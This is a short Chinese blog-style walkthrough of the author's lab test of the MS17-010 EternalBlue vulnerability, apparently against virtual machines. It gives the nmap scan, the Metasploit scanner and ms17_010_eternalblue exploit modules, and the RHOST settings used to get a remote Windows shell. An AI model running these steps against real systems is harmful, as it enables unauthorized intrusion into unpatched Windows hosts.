晚上在看頭條的時候,看到了一篇用ms17-010永恆之藍漏洞來證明qq瀏覽器和360瀏覽器誰的防禦能力更強的視頻,於是想著自己也來動手試一試,整體來說來metasploit上手非常快,操作步驟也不是很多,熟悉的話就很快的熟能生巧了。
一共試驗了兩次,第一次失敗了,在最終的結果返回的是FAIL,這臺主機445埠是開放的,在入侵的前幾步過程中也是提示可以被入侵的,但是最終提示不行,也有可能是因為打了對應的補丁了吧,於是用另一臺虛擬機來實驗,結果成功了,接下來說下具體的試驗過程:
第一步,利於nmap查看被入侵主機是否可以445埠
nmap -sS -sV -Pn 192.168.1.22,根據返回結果可以看到是存在445埠的
然後打開metasploit或者在終端輸入msfconsle
有趣的是每次啟動metasploit時界面都會不同,這可能是屬於程式設計師的浪漫了吧!
然後先利用auxiliary/scanner/smb/smb_ms17_010模塊進行漏洞分析,驗證445埠是否能夠被入侵
使用show options查看ms17-010漏洞的詳細信息,這裡可以看到當前設置的埠為445,但RHOST的位置為空,這裡需要設置下ip,對應的ip就是你的被入侵主機的ip
set RHOST 192.168.1.22
執行run,能夠看到xxx主機看起來有可被利用的ms17-010的永恆之藍漏洞,這裡就基本上可以確認這臺主機是可以被入侵的
執行use exploit/windows/smb/ms17_010_eternalblue使用ms17-010攻擊模塊準備攻擊
還可以通過show targets查看哪些系統的主機可以被入侵
可以看到win7和server2008 R2系列都是可以的,對win7試驗完的朋友還可以對server 2008R2的來試一下。
接下來再一次的設置被攻擊的主機ip,set RHOST 192.168.1.22
接下來run 等待結果就行了,在執行過程中如果看到出現了WIN信息的時候就表示已經成功了
然後回車就會發現已經進入到windows的操作界面了,然後可以通過在桌面建立個文件夾來證明入侵成功的